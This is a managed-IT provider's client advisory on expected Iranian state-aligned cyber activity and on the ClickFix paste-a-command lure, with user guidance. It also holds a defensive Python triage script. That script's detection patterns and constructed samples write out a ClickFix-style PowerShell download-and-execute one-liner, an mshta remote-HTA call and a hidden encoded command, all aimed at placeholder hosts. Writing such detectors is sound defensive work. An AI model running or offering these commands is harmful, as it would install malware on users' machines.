Announcements

Elevated Cyber Threat and Risk

This advisory is issued as a proactive measure in response to current geopolitical developments and their potential cyber implications.

Pliancy has already heightened monitoring across all managed systems, reviewed key controls, and engaged our security partners to ensure appropriate protections are in place.

What’s Happening

Following recent military actions involving Iran, Israel, and the United States, our security partners and vendors have assessed that Iranian state-aligned cyber activity is likely to intensify in the near term. Iran has a documented history of leveraging cyber operations alongside kinetic military action, including espionage campaigns, destructive malware, and coordinated disinformation.

Important context: As of this advisory, no significant malicious cyber activity has been directly attributed to these events. This is a proactive, precautionary notice.

Who May Be Affected

Organizations in the U.S. and allied nations, particularly those in financial services, life sciences, government, critical infrastructure, and media, are assessed as potential targets for direct or indirect cyber activity.

Cyber Threat Overview

Threat Category: Precision Espionage
  Key Tactics, Techniques & Procedures (TTPs): Spearphishing, credential harvesting, custom malware (APT34, APT42)
  Potential Impact: Direct. Financial services and life science clients are high-value targets.

Threat Category: Destructive Attacks
  Key TTPs: Wiper malware, DDoS, defacement via fake hacktivist personas
  Potential Impact: Moderate. Client-facing infrastructure is exposed.

Threat Category: Influence & Disinformation
  Key TTPs: Fabricated leaks, social media manipulation, Telegram-based campaigns
  Potential Impact: Low to Moderate. Reputational risk to clients in public-facing sectors.

Threat Category: Infrastructure Probing
  Key TTPs: ICS/OT targeting, low-impact/high-visibility attacks on utilities
  Potential Impact: Low. Primarily affects organizations managing ICS/OT, but some life science environments with lab systems may be impacted.

What We’re Doing

Pliancy is taking the following steps to strengthen your security posture:

  • Endpoint Protection: We have deployed additional detection rules aligned to Iranian threat actor tradecraft, including credential theft, PowerShell abuse, tunneling tools, and destructive malware techniques.
  • Identity Monitoring: We are validating identity and access monitoring settings to ensure that all accounts are protected by MFA and that no unexpected MFA bypasses exist.
  • Threat Hunting: We have initiated a proactive threat hunt across client environments for known indicators of compromise and the tactics associated with this activity.

A Note on Detection Sensitivity:
Due to the additional detection controls and rules we have enabled in response to the current threat environment, there is an increased chance of false positive alerts (legitimate activity flagged as suspicious). We are actively monitoring all managed environments and will tune rules as needed to minimize disruption while maintaining strong coverage. If you notice unexpected alerts or blocked activity, please let your Pliancy consultant or Outpost advisor know so we can investigate and adjust promptly.

Active Threat: ClickFix Social Engineering Technique

Alongside this Iranian threat activity, we have also observed a recent uptick in true-positive detections of the ClickFix technique across multiple client environments.

What is ClickFix? ClickFix is a social engineering attack disguised as a helpful prompt. You may encounter a fake error message, CAPTCHA, or “verification” pop-up on a website or in an email that instructs you to “fix” something by copying a command and pasting it into a Windows Run dialog (Win+R) or PowerShell. If followed, those instructions silently download and execute malware on your machine.
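As an added illustration (not Pliancy or Outpost tooling), the following Python script shows how an analyst might triage the two host artifacts a ClickFix paste leaves behind: the Win+R history Windows keeps under the RunMRU registry key, and process-creation events in which explorer.exe (the parent of anything launched from the Run dialog) spawns a shell or LOLBin with a download cradle. The registry values, process events and URLs in it are constructed for the example, and nothing is read from a live system.

```python
"""Heuristic ClickFix triage over constructed sample artifacts.

Added example for this advisory; it is not Pliancy/Outpost tooling.
ClickFix lures talk a user into pasting a one-liner into Win+R or a shell,
so two host artifacts are worth checking:
  1. Win+R history, kept under HKCU\\Software\\Microsoft\\Windows\\
     CurrentVersion\\Explorer\\RunMRU (each value is the command plus "\\1",
     and the MRUList value orders the slots most-recent first), and
  2. process-creation events where an interactive parent (explorer.exe for
     the Run dialog) spawns a shell or LOLBin with a download cradle.
All sample data below is constructed; the registry is not read live.
"""
import re

# Traits common to pasted ClickFix one-liners. Each entry: (regex, label).
SUSPICIOUS_PATTERNS = [
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", "download cradle"),
    (r"\biex\b|invoke-expression", "inline execution"),
    (r"-w(indowstyle)?\s+h(idden)?\b", "hidden window"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(mshta|certutil|bitsadmin|curl|wscript|cscript)\b", "LOLBin launcher"),
    (r"https?://", "remote URL"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in SUSPICIOUS_PATTERNS]

# Parents that imply a human typed or pasted the command (Run dialog, terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}


def score_command(cmdline: str) -> list[str]:
    """Return the labels of every ClickFix trait found in a command line."""
    return [label for rx, label in COMPILED if rx.search(cmdline)]


def triage_runmru(runmru: dict[str, str]) -> list[dict]:
    """Walk RunMRU most-recent-first and return entries with ClickFix traits."""
    hits = []
    for slot in runmru.get("MRUList", ""):
        raw = runmru.get(slot, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip the "\1" suffix
        reasons = score_command(cmd)
        if reasons:
            hits.append({"slot": slot, "command": cmd, "reasons": reasons})
    return hits


def triage_process_events(events: list[dict]) -> list[dict]:
    """Flag shell/LOLBin launches from an interactive parent that carry traits.

    Suspicious command lines under a non-interactive parent (a service or
    scheduled task) are real findings too, but they are not ClickFix-shaped,
    so this heuristic leaves them to other rules.
    """
    flagged = []
    for ev in events:
        if ev["parent"].lower() not in INTERACTIVE_PARENTS:
            continue
        reasons = score_command(ev["cmdline"])
        if reasons:
            flagged.append({**ev, "reasons": reasons})
    return flagged


# Constructed Win+R history: slot "c" is the pasted ClickFix lure.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iex (irm https://example.invalid/verify.txt)"\\1',
}

# Constructed process-creation events (parent image, child image, command line).
SAMPLE_PROCESS_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/captcha/fix.hta"},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -w hidden -enc aQBlAHgAIAAoAGkAcgBtACAAaAB0AHQAcAA6AC8ALwA="},
]

if __name__ == "__main__":
    for hit in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU[{hit['slot']}]: {hit['command']!r} -> {hit['reasons']}")
    for ev in triage_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"{ev['parent']} -> {ev['image']}: {ev['reasons']}")
```

The benign explorer.exe-to-powershell.exe event (a signed backup script) is deliberately not flagged: the parent relationship alone is far too common to alert on, so the heuristic requires both an interactive parent and at least one cradle, hidden-window, encoded-command or LOLBin trait. The svchost.exe event carries two of those traits but is skipped here because a service-launched command is not something a user pasted; that pattern belongs to a different rule, not to ClickFix triage.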

How to protect yourself:

  • Never copy and paste commands from a website, pop-up, or email into Run, PowerShell, Terminal, or Command Prompt
  • Legitimate websites and services will never ask you to do this. If a page tells you to press Win+R or open a terminal to “verify” yourself, close it immediately
  • Report it. If you see one of these prompts, take a screenshot and send it to your Pliancy consultant or Outpost advisor right away

While we are actively monitoring and responding to these detections, we ask that all clients and their teams stay extra vigilant for unusual prompts, pop-ups, or instructions that ask you to interact with system tools.

What We Recommend You Do

  1. Remind your team to stay alert for phishing. Expect an increase in socially engineered emails. If something looks suspicious, stop and report it immediately
  2. Verify MFA is enabled for all business-critical accounts, VPN access, and email
  3. Report any unusual activity to your Pliancy consultant or Outpost advisor promptly, including unexpected login prompts, password reset requests you did not initiate, or unfamiliar devices on your accounts
  4. Review your incident response plan and contacts. Make sure your team is familiar with the process and knows whom to call if something goes wrong

Our Commitment

We are closely monitoring this situation and will provide updates if the threat landscape changes materially. Your security posture is actively managed, and our detection and response capabilities are tuned for the current environment.  

Please contact your Pliancy consultant with questions or concerns.

If you would like to discuss security advisory services and incident response preparation, inform your consultant, and they will coordinate a discussion with our Outpost team to explore options.

Thank you for your continued partnership and trust.

Outpost Security by Pliancy